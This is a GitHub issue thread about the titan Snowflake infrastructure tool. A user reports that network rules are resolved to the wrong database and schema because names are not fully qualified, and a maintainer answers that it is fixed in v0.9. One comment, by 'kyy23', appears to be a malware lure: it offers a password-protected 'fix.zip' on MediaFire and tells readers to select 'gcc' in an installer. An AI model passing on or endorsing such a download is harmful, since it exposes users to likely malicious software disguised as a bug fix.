### ISSUE TITLE
Not using fully qualified name results in using the wrong database/schema for a resource by reverting to connection ones.

### ISSUE THREAD

**Issue by aleenprd** [Titan-Systems/titan#98]
Perhaps I am making mistakes or perhaps the package is simply not mature enough at the moment but I am deeply struggling to to the simplest things with it.

Is there a possibility to explain how you actually envision this project being used in production? I.e. what roles to use for connection. How to structure the project? How to declare resources and how to build the plans?

Example:
- `CREATE NETWORK POLICY TITAN_TEST_NETWORK_POLICY ALLOWED_NETWORK_RULE_LIST = (TITAN_TEST_NETWORK_RULE) COMMENT = $$Demo network policy for testing purposes of titan[core].$$`  will error because titan does not use fully qualified names.` Network rule 'TITAN_TEST_DB.PUBLIC.TITAN_TEST_NETWORK_RULE' does not exist or not authorized.` when the actual resource is declared explicitly as: 
```
titan_test_network_rule = NetworkRule(
    name="TITAN_TEST_NETWORK_RULE",
    type="IPV4",
    value_list=["85.83.225.229"],
    mode="INGRESS",
    comment="Demo network rule resticting access to home Wifi only.",
    owner="SYSADMIN",
    database=titan_test_db,
    schema=titan_test_schema,
)

titan_test_network_policy = NetworkPolicy(
    name="TITAN_TEST_NETWORK_POLICY",
    comment="Demo network policy for testing purposes of titan[core].",
    owner="SYSADMIN",
    allowed_network_rule_list=[titan_test_network_rule],
    blocked_network_rule_list=None,
    allowed_ip_list=None,
    blocked_ip_list=None,
    database=titan_test_db,
    schema=titan_test_schema,
)
```
How many different plans do I need to create, how many different connections do I need to manage to use titan in a complex real world Snowflake setup?

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by teej** [comment]
Fixed in [v0.9](https://github.com/Titan-Systems/titan/releases/tag/v0.9.1)
